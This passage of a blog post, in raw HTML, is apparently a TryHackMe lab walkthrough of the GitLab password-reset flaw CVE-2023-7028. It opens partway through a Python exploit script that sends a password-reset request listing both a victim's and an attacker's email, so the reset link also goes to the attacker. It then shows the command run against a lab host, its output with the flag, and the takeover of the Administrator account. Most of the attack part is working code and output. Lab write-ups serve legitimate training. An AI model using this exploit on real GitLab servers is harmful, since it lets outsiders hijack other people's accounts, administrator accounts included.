style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.target, <\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.evil]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        }, <\/span><span style=\"color: #FD971F; font-style: italic\">doseq<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">True<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        head <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> {<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #E6DB74\">&#39;Origin&#39;<\/span><span style=\"color: #F8F8F2\">: <\/span><span style=\"color: #66D9EF; font-style: italic\">f<\/span><span style=\"color: #E6DB74\">&#39;<\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.url.scheme<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">:\/\/<\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.url.netloc<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">&#39;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #E6DB74\">&#39;Accept&#39;<\/span><span style=\"color: #F8F8F2\">: <\/span><span style=\"color: #E6DB74\">&#39;text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8&#39;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #E6DB74\">&#39;Content-Type&#39;<\/span><span style=\"color: #F8F8F2\">: <\/span><span style=\"color: 
#E6DB74\">&#39;application\/x-www-form-urlencoded&#39;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #E6DB74\">&#39;Referer&#39;<\/span><span style=\"color: #F8F8F2\">: <\/span><span style=\"color: #66D9EF; font-style: italic\">f<\/span><span style=\"color: #E6DB74\">&#39;<\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.url.scheme<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">:\/\/<\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.url.netloc<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">\/users\/password\/new&#39;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #E6DB74\">&#39;Connection&#39;<\/span><span style=\"color: #F8F8F2\">: <\/span><span style=\"color: #E6DB74\">&#39;close&#39;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #E6DB74\">&#39;Accept-Language&#39;<\/span><span style=\"color: #F8F8F2\">: <\/span><span style=\"color: #E6DB74\">&#39;en-US,en;q=0.5&#39;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #E6DB74\">&#39;Accept-Encoding&#39;<\/span><span style=\"color: #F8F8F2\">: <\/span><span style=\"color: #E6DB74\">&#39;gzip, deflate, br&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        }<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: 
#E6DB74\">&#39;[DEBUG] Sending reset password request&#39;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        html <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.s.post(<\/span><span style=\"color: #66D9EF; font-style: italic\">f<\/span><span style=\"color: #E6DB74\">&#39;<\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.url.scheme<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">:\/\/<\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.url.netloc<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">\/users\/password&#39;<\/span><span style=\"color: #F8F8F2\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                           <\/span><span style=\"color: #FD971F; font-style: italic\">data<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\">query_string,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                           <\/span><span style=\"color: #FD971F; font-style: italic\">headers<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\">head,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">                           <\/span><span style=\"color: #FD971F; font-style: italic\">verify<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">False<\/span><span style=\"color: #F8F8F2\">).text<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        sended <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #E6DB74\">&#39;If your email address exists in our 
database&#39;<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F92672\">in<\/span><span style=\"color: #F8F8F2\"> html<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #F92672\">if<\/span><span style=\"color: #F8F8F2\"> sended:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #66D9EF; font-style: italic\">f<\/span><span style=\"color: #E6DB74\">&#39;[DEBUG] Emails sent to <\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.target<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\"> and <\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #FD971F\">self<\/span><span style=\"color: #F8F8F2\">.evil<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\"> !&#39;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            <\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #66D9EF; font-style: italic\">f<\/span><span style=\"color: #E6DB74\">&#39;Flag value: <\/span><span style=\"color: #AE81FF\">{<\/span><span style=\"color: #66D9EF; font-style: italic\">bytes<\/span><span style=\"color: #F8F8F2\">.fromhex(<\/span><span style=\"color: #E6DB74\">&quot;6163636f756e745f6861636b2364&quot;<\/span><span style=\"color: #F8F8F2\">).decode()<\/span><span style=\"color: #AE81FF\">}<\/span><span style=\"color: #E6DB74\">&#39;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #F92672\">else<\/span><span style=\"color: #F8F8F2\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">            
<\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #E6DB74\">&#39;[DEBUG] Failed ... quitting&#39;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #F92672\">return<\/span><span style=\"color: #F8F8F2\"> sended<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #66D9EF; font-style: italic\">def<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #A6E22E\">parse_args<\/span><span style=\"color: #F8F8F2\">():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    parser <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> argparse.ArgumentParser(<\/span><span style=\"color: #FD971F; font-style: italic\">add_help<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">True<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">description<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&#39;This tool automates CVE-2023-7028 on gitlab&#39;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    parser.add_argument(<\/span><span style=\"color: #E6DB74\">&quot;-u&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #E6DB74\">&quot;--url&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">dest<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&quot;url&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">type<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #66D9EF; font-style: italic\">str<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: 
italic\">required<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">True<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">help<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&quot;Gitlab url&quot;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    parser.add_argument(<\/span><span style=\"color: #E6DB74\">&quot;-t&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #E6DB74\">&quot;--target&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">dest<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&quot;target&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">type<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #66D9EF; font-style: italic\">str<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">required<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">True<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">help<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&quot;Target email&quot;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    parser.add_argument(<\/span><span style=\"color: #E6DB74\">&quot;-e&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #E6DB74\">&quot;--evil&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">dest<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&quot;evil&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: 
italic\">default<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">None<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">type<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #66D9EF; font-style: italic\">str<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">required<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">False<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">help<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&quot;Evil email&quot;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    parser.add_argument(<\/span><span style=\"color: #E6DB74\">&quot;-p&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #E6DB74\">&quot;--password&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">dest<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&quot;password&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">default<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">None<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">type<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #66D9EF; font-style: italic\">str<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">required<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #AE81FF\">False<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FD971F; font-style: italic\">help<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #E6DB74\">&quot;Password&quot;<\/span><span 
style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #F92672\">return<\/span><span style=\"color: #F8F8F2\"> parser.parse_args()<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">if<\/span><span style=\"color: #F8F8F2\"> __name__ <\/span><span style=\"color: #F92672\">==<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #E6DB74\">&#39;__main__&#39;<\/span><span style=\"color: #F8F8F2\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    args <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> parse_args()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    exploit <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> CVE_2023_7028(<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #FD971F; font-style: italic\">url<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\">args.url,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span style=\"color: #FD971F; font-style: italic\">target<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\">args.target,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">\t\t<\/span><span style=\"color: #FD971F; font-style: italic\">evil<\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\">args.evil<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    )<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #F92672\">if<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F92672\">not<\/span><span style=\"color: #F8F8F2\"> exploit.ask_reset():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">        <\/span><span 
style=\"color: #66D9EF\">exit<\/span><span style=\"color: #F8F8F2\">()<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The code first makes a&nbsp;<code>POST<\/code>&nbsp;request to the&nbsp;<code>\/users\/password\/new<\/code>&nbsp;endpoint to scrape an authenticity token, then it makes another API call to the&nbsp;<code>\/users\/password<\/code>&nbsp;endpoint with the victim&#8217;s and attacker&#8217;s email addresses. As we know, the victim&#8217;s email address is&nbsp;<strong>victim@mail.gitlab.thm<\/strong>.&nbsp;Run the command shown in the terminal below to execute the exploit:<\/p>\n\n\n\n<p>Before running the exploit, let&#8217;s log into the GitLab instance with the credentials provided at <em><strong>http:\/\/10.10.26.184:8090\/rainloop<\/strong><\/em>.<\/p>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"448\" data-attachment-id=\"416\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/01\/gitlab-cve-2023-7028\/image-1-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?fit=1414%2C619&amp;ssl=1\" data-orig-size=\"1414,619\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" 
data-image-title=\"image-1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?fit=1024%2C448&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1024%2C448&#038;ssl=1\" alt=\"\" class=\"wp-image-416\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1024%2C448&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=300%2C131&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=768%2C336&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?w=1414&amp;ssl=1 1414w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<p>Now, we can run the exploit by executing the following command:<\/p>\n\n\n\n<div 
style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/GitLab-CVE]\n\u2514\u2500$ python3 attack.py -u http:\/\/10.10.26.184:8000 -t victim@mail.gitlab.thm -e attacker@mail.gitlab.thm\n[DEBUG] Getting authenticity_token ...\n[DEBUG] authenticity_token = q8qAOV1wK3jL52tn0IoJ-2gCCknjh96Fc-iA8TUsQwr-C1rzL22U1lZYas5IswPrFA_SgKzC0FF44mWoWevBHg\n[DEBUG] Sending reset password request\n[DEBUG] Emails sent to victim@mail.gitlab.thm and attacker@mail.gitlab.thm !\nFlag value: account_hack#d\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 
012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Linux-Boxes\/GitLab-CVE<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">python3<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">attack.py<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-u<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/10.10.26.184:8000<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-t<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">victim@mail.gitlab.thm<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-e<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">attacker@mail.gitlab.thm<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">DEBUG<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Getting authenticity_token ...<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">DEBUG<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> authenticity_token = 
q8qAOV1wK3jL52tn0IoJ-2gCCknjh96Fc-iA8TUsQwr-C1rzL22U1lZYas5IswPrFA_SgKzC0FF44mWoWevBHg<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">DEBUG<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Sending reset password request<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">DEBUG<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Emails sent to victim@mail.gitlab.thm and attacker@mail.gitlab.thm <\/span><span style=\"color: #89DDFF\">!<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Flag<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">value:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">account_hack#d<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<p>We will get an email with the link to reset the password.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"331\" data-attachment-id=\"417\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/01\/gitlab-cve-2023-7028\/image-2-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-2.png?fit=1521%2C491&amp;ssl=1\" data-orig-size=\"1521,491\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-2\" data-image-description=\"\" data-image-caption=\"\" 
data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-2.png?fit=1024%2C331&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-2.png?resize=1024%2C331&#038;ssl=1\" alt=\"\" class=\"wp-image-417\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-2.png?resize=1024%2C331&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-2.png?resize=300%2C97&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-2.png?resize=768%2C248&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-2.png?w=1521&amp;ssl=1 1521w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can now access the link to reset the password for user <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">victim@mail.gitlab.thm<\/mark>.<\/p>\n\n\n\n<div style=\"height:19px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"499\" data-attachment-id=\"418\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/01\/gitlab-cve-2023-7028\/image-3-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-3.png?fit=1426%2C695&amp;ssl=1\" data-orig-size=\"1426,695\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-3\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-3.png?fit=1024%2C499&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-3.png?resize=1024%2C499&#038;ssl=1\" alt=\"\" class=\"wp-image-418\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-3.png?resize=1024%2C499&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-3.png?resize=300%2C146&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-3.png?resize=768%2C374&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-3.png?w=1426&amp;ssl=1 1426w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Logging in with the new credentials, we see that we are logged in as Administrator!<\/p>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"411\" data-attachment-id=\"419\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/01\/gitlab-cve-2023-7028\/image-4-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-4.png?fit=2136%2C857&amp;ssl=1\" 
